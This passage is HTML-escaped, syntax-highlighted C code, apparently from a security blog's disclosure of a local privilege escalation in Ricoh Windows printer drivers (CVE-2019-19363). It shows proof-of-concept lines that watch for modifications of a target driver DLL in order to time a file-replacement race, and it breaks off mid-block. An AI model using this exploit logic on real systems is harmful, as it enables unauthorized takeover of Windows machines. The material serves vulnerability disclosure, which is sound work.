&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-45"&gt;&lt;code data-line-number=" 45"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-45" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-45"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;LPOVERLAPPED&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;lpOverlapped&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-46"&gt;&lt;code data-line-number=" 46"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-46" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-46"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;PFILE_NOTIFY_INFORMATION&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-47"&gt;&lt;code data-line-number=" 47"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-47" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-47"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-48"&gt;&lt;code data-line-number=" 48"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-48" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-48"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-49"&gt;&lt;code data-line-number=" 49"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-49" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-49"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;do&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-50"&gt;&lt;code data-line-number=" 50"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-50" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-50"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-51"&gt;&lt;code data-line-number=" 51"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-51" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-51"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;GetQueuedCompletionStatus&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;dwCompletionPort&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;numBytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPDWORD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;lpOverlapped&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;INFINITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-52"&gt;&lt;code data-line-number=" 52"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-52" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-52"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-53"&gt;&lt;code data-line-number=" 53"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-53" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-53"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-54"&gt;&lt;code data-line-number=" 54"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-54" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-54"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;PFILE_NOTIFY_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;lpBuffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-55"&gt;&lt;code data-line-number=" 55"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-55" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-55"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-56"&gt;&lt;code data-line-number=" 56"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-56" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-56"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="k"&gt;do&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-57"&gt;&lt;code data-line-number=" 57"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-57" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-57"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="n"&gt;cbOffset&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;NextEntryOffset&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-58"&gt;&lt;code data-line-number=" 58"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-58" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-58"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-59"&gt;&lt;code data-line-number=" 59"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-59" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-59"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="c1"&gt;// get filename&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-60"&gt;&lt;code data-line-number=" 60"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-60" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-60"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;num_elem&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;FileNameLength&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-61"&gt;&lt;code data-line-number=" 61"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-61" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-61"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;num_elem&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;num_elem&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-62"&gt;&lt;code data-line-number=" 62"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-62" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-62"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-63"&gt;&lt;code data-line-number=" 63"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-63" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-63"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="n"&gt;wcsncpy_s&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;num_elem&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-64"&gt;&lt;code data-line-number=" 64"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-64" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-64"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;num_elem&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-65"&gt;&lt;code data-line-number=" 65"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-65" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-65"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Event for %s [%d]&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-66"&gt;&lt;code data-line-number=" 66"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-66" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-66"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-67"&gt;&lt;code data-line-number=" 67"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-67" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-67"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;Action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_ACTION_MODIFIED&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-68"&gt;&lt;code data-line-number=" 68"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-68" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-68"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-69"&gt;&lt;code data-line-number=" 69"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-69" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-69"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;wcscmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FileName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDLLRelFilePath&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-70"&gt;&lt;code data-line-number=" 70"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-70" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-70"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-71"&gt;&lt;code data-line-number=" 71"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-71" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-71"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-72"&gt;&lt;code data-line-number=" 72"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-72" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-72"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-73"&gt;&lt;code data-line-number=" 73"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-73" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-73"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
